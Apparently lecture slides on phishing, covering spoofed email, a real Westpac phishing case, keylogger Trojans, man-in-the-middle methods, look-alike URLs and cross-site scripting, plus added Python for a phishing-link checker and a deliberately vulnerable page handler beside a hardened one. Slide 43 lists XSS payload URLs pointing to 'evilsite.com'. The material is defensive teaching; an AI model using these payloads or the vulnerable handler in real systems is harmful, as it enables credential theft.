2. About me
Currently, Lecturer in this department for 351 days
Former Research Intern in M3C Laboratory, University of Bolton, UK
Rushdi Shams, Lecturer, Dept of CSE, KUET, Bangladesh 2
3. For you
Email me at rushdecoder@yahoo.com if you want
My homepage and course materials are at http://rushdishams.googlepages.com
You need to join http://groups.google.com/group/csebatchesofrushdi
4. Phishing
The number of unique e-mail-based fraud attacks detected in November 2005 was 16,882, almost double the 8,975 attacks launched in November 2004, said the report (Anti-Phishing Working Group)
Phishing e-mails pretend to come from legitimate companies, such as banks and e-commerce sites
Used by criminals to try and trick Web users into revealing personal information and account details
5. Phishing
The number of brands targeted increased by nearly 50 percent over the course of 2005, from 64 percent to 93 percent in November 2006
"One big attack will temporarily hurt a brand, but the increase in e-commerce is not slowing down," (Mark Murtagh, Websense technical director)
6. Phishing
Top brands continue to be hijacked, with phishers using established names to try to lure people to their sites
eBay is often spoofed, for obvious reasons
Google is increasingly being targeted because of its expansion into different business application models.
The big banking names are used too: HSBC, Citigroup, Lloyds, all the major brands
7. Phishing
There's no point in using local names if the attack is global
Attacks are becoming increasingly sophisticated
Web sites are hosting keylogging malicious software
Before, people had to click on a site to download malicious code.
If they thought a web site 'phishy,' they could leave and probably not be harmed.
Now, with most phishing sites they just have to
8. Phishing
Twenty-five percent of those sites now host keylogging code
If you visit one you will probably open yourself to identity theft or fraud
9. Exploiting the Weakness
Why are crooks able to mount an attack?
What are the weaknesses that they exploit?
Richness of functionality
Complex systems can have program bugs
Increasing interconnectivity
Separate functions of any system are combined and interconnected via the Internet
10. Exploiting the Weakness
Expanding market in exploits
Very little skill is required, as the technical tools are impressive and cheap
The scale of content-based attacks
Everyone uses e-mail and e-mail is exploitable, so why not?
11. Social Engineering Factors
Phishing attacks rely upon a mix of technical deceit and social engineering practices.
In the majority of cases the phisher must persuade the victim
The victim intentionally performs a series of actions that will provide access to confidential information
12. Social Engineering Factors
Communication channels such as email, web-pages, IRC and instant messaging services are popular.
The phisher must impersonate a trusted source (e.g. the helpdesk of their bank, an automated support response from their favourite online retailer, etc.) for the victim to believe.
14. Phishing Techniques
Phishing attacks initiated by email are the most common.
Using Trojan networks, phishers can deliver specially crafted emails to millions of legitimate "live" email addresses within a few hours
Sometimes phishers purchase e-mail addresses
15. Phishing Techniques
Utilising well-known flaws in the common mail server communication protocol (SMTP), phishers are able to create emails with fake "Mail From:" headers and impersonate any organisation they choose.
Any customer replies to the phishing email will be sent to them.
16. Phishing Techniques
Official-looking and official-sounding emails
Copies of legitimate corporate emails with minor URL changes
HTML-based email used to obfuscate target URL information
Standard virus/worm attachments to emails
17. Phishing Techniques
A plethora of anti-spam-detection inclusions
Crafting of "personalised" or unique email messages
Fake postings to popular message boards and mailing lists
Use of fake "Mail From:" addresses and open mail relays to disguise the source of the email
18. A real-life phishing example
19. Things to note
The email was sent in HTML format
Lower-case L's have been replaced with upper-case I's. This is used to help bypass many standard anti-spam filters
20. Things to note
Within the HTML-based email, the URL link https://oIb.westpac.com.au/ib/defauIt.asp in fact points to an escape-encoded version of the following URL:
http://olb.westpac.com.au.userdll.com:4903/ib/index.htm
22. Things to note
The non-standard HTTP port of 4903 can be attributed to the fact that the phisher's fake site was hosted on a third-party PC that had previously been compromised by an attacker
23. Things to note
Recipients that clicked on the link were then forwarded to the real Westpac application.
However, a JavaScript popup window containing a fake login page was presented
24. Things to note
This fake login window was designed to capture and store the recipient's authentication credentials
JavaScript also submitted the authentication information to the real Westpac application
25. Where are they standing now?
The inclusion of HTML-disguised links
The use of third-party supplied, or fake, banner advertising graphics to lure customers
The use of web-bugs (hidden items within the page, such as a zero-sized graphic) to track a potential customer
The use of pop-up or frameless windows to disguise the true source of the phisher's message.
26. Where are they standing now?
Embedding malicious content within the viewable web-page installs software of the phisher's choice (e.g. key-loggers, screen-grabbers, back-doors and other Trojan horse programs).
28. IRC and IM
New on the phishers' radar, IRC and Instant Messaging (IM) forums are likely to become a popular phishing ground.
The common usage of Bots (automated programs that listen and participate in group discussions) in many of the popular channels
29. Trojan Hosts
The delivery source is increasingly becoming home PCs that have been previously compromised.
A Trojan horse program has been installed which allows phishers (along with spammers, warez pirates, DDoS bots, etc.) to use the PC as a message propagator.
Tracking back a phishing attack to the individual initiating criminal is extremely difficult.
30. Trojan Hosts
The installation of Trojan horse software is on the increase, despite the efforts of large anti-virus companies.
Phishers operate large networks of Trojan deployments (networks consisting of thousands of hosts are not uncommon)
Phishers must be selective about the information they wish to record or be faced with information overload.
31. Information Specific Trojans
You have come across a file named JavaUtil.zip.
But you forgot that you have "do not show known file extensions" in your Windows settings.
Hmm, then JavaUtil.zip may originally be a .exe file whose full name is JavaUtil.zip.exe
You, unfortunately, click that zip file to unzip it.
You are doomed!
32. Information Specific Trojans
Early in 2004, a phisher created a custom key-logger Trojan.
The Trojan key-logger was designed specifically to capture all key presses within windows with titles of various names including: commbank, Commonwealth, NetBank, Citibank, Bank of America, e-gold, e-bullion, e-Bullion, evocash, EVOCash, EVOcash, intgold, INTGold, paypal, PayPal, bankwest, Bank West, BankWest, National Internet Banking, cibc, CIBC, scotiabank and ScotiaBank
34. Man in the Middle Attacks
The attacker situates themselves between the customer and the real web-based application, and proxies all communications between the systems.
This form of attack is successful for both HTTP and HTTPS communications.
The customer connects to the attacker's server as if it was the real site
The attacker's server makes a simultaneous connection to the real site.
35. Man in the Middle Attacks
The attacker's server then proxies all communications between the customer and the real web-based application server
In the case of secure HTTPS communications, an SSL connection is established between the customer and the attacker's proxy
while the attacker's proxy creates its own SSL connection between itself and the real server.
36. Man in the Middle Attacks
37. Man in the Middle Attacks
The attacker must be able to direct the customer to their proxy server instead of the real server.
This may be carried out through a number of methods:
Transparent Proxies
DNS Cache Poisoning
URL Obfuscation
38. Transparent Proxies
Situated on the same network segment or located en route to the real server, a transparent proxy service can intercept all data by forcing all outbound HTTP and HTTPS traffic through itself.
39. DNS Cache Poisoning
DNS cache poisoning can be used to disrupt normal traffic routing by injecting false IP addresses for key domain names.
The attacker poisons the DNS cache of a network firewall so that all traffic destined for the MyBank IP address now resolves to the attacker's proxy server IP address
40. URL Obfuscation
The attacker tricks the customer into connecting to their proxy server instead of the real server.
The customer may follow a link to
http://privatebanking.mybank.com.ch
http://mybank.privatebanking.com
http://privatebanking.mybonk.com
http://privatebanking.mybánk.com
http://privatebanking.mybank.hackproof.com
And the real one is
http://privatebanking.mybank.com
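As an added example (not from the deck or from The Phishing Guide), here is a small Python checker for the link tricks described on slides 19, 20 and 40: it percent-decodes the href, compares the host shown in the link text with the host the href really reaches, folds the I-for-l and accented-letter substitutions, catches one-character typo domains, flags a brand name used as a decoy label, and flags a non-standard port. The allowlist of genuine domains is a constructed assumption.

```python
import unicodedata
from urllib.parse import unquote, urlsplit

# Constructed allowlist: the only domains this checker treats as genuine.
LEGIT = ("mybank.com", "westpac.com.au")

def fold(host: str) -> str:
    """Undo the visual tricks in the deck: upper-case I for lower-case l, accents (mybánk)."""
    plain = unicodedata.normalize("NFKD", host).encode("ascii", "ignore").decode()
    return plain.replace("I", "l").lower()

def edits(a: str, b: str) -> int:
    """Levenshtein distance, to catch one-character typo domains such as mybonk."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]

def host_port(url: str):
    """Host (case preserved) and port after undoing percent-encoding that hides the real target."""
    parts = urlsplit(unquote(url))
    return parts.netloc.rsplit("@", 1)[-1].split(":")[0], parts.port

def is_genuine(host: str) -> bool:
    return any(host.lower() == d or host.lower().endswith("." + d) for d in LEGIT)

def analyse_link(href: str, shown_text: str = "") -> list[str]:
    """Reasons a link looks like phishing; an empty list means it passed every check."""
    host, port = host_port(href)
    reasons = []
    if not is_genuine(host):
        reasons.append("host is not a genuine domain")
        if any(edits(fold(host)[-len(d):], d) <= 1 for d in LEGIT):
            reasons.append("host is a look-alike of a genuine domain")
        for brand in (d.split(".")[0] for d in LEGIT):
            if brand in host.lower().split("."):
                reasons.append(f"brand '{brand}' used as a decoy label")
    if not host.isascii():
        reasons.append("non-ASCII characters in host (homoglyph)")
    if port not in (None, 80, 443):
        reasons.append(f"non-standard port {port}")
    if "://" in shown_text and host_port(shown_text)[0].lower() != host.lower():
        reasons.append("link text shows a different host than the href")
    return reasons
```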
42. Cross Site Scripting (XSS)
XSS attacks make use of custom URL or code injection into a valid web-based application URL
They are the result of poor web-application development processes.
43. Cross Site Scripting (XSS)
Full HTML substitution such as:
http://mybank.com/ebanking?URL=http://evilsite.com/phishing/fakepage.htm
Inline embedding of scripting content, such as:
http://mybank.com/ebanking?page=1&client=<SCRIPT>evilcode
Forcing the page to load external scripting code, such as:
http://mybank.com/ebanking?page=1&response=evilsite.com%21evilcode.js&go=2
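As an added example (not from the deck or from The Phishing Guide), the three URL patterns above come from one underlying mistake, shown here in Python as a vulnerable page handler beside its hardened version: an unvalidated redirect parameter, a parameter echoed into HTML unescaped, and a script location built from a parameter. The site origin and the script allowlist are constructed assumptions.

```python
import html
from urllib.parse import unquote, urljoin, urlsplit

SITE = "https://mybank.com"                 # constructed: the application's own origin
SCRIPTS = {"balance.js", "transfer.js"}     # constructed: the only scripts the page may load

def vulnerable_page(params: dict) -> str:
    """The pattern behind all three URLs in the deck: parameters are pasted in as-is."""
    if "URL" in params:                     # full HTML substitution (open redirect)
        return f'<meta http-equiv="refresh" content="0;url={params["URL"]}">'
    page = f"<p>Welcome {params.get('client', '')}</p>"      # inline script injection
    if "response" in params:                # attacker-chosen external script
        page += f'<script src="{unquote(params["response"])}"></script>'
    return page

def safe_redirect(target: str) -> str:
    """Resolve the target against our own origin and refuse anything that leaves it."""
    ours = urlsplit(SITE)
    resolved = urlsplit(urljoin(SITE + "/", target))
    if (resolved.scheme, resolved.netloc) != (ours.scheme, ours.netloc):
        return SITE + "/"
    return resolved.geturl()

def safe_script(name: str) -> str:
    """Only serve scripts from a fixed allowlist, never a URL built from the parameter."""
    clean = unquote(name)
    return f'<script src="/static/{clean}"></script>' if clean in SCRIPTS else ""

def hardened_page(params: dict) -> str:
    """Same page, with each parameter validated or escaped before it reaches the HTML."""
    if "URL" in params:
        return f'<meta http-equiv="refresh" content="0;url={html.escape(safe_redirect(params["URL"]))}">'
    page = f"<p>Welcome {html.escape(params.get('client', ''))}</p>"
    if "response" in params:
        page += safe_script(params["response"])
    return page
```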
44. Cross Site Scripting (XSS)
48. References
The Phishing Guide by Next Generation Security Software Limited.
49. Related Papers
Technical Trends in Phishing Attacks by Jason Milletary
Why Phishing Works by Dhamija et al.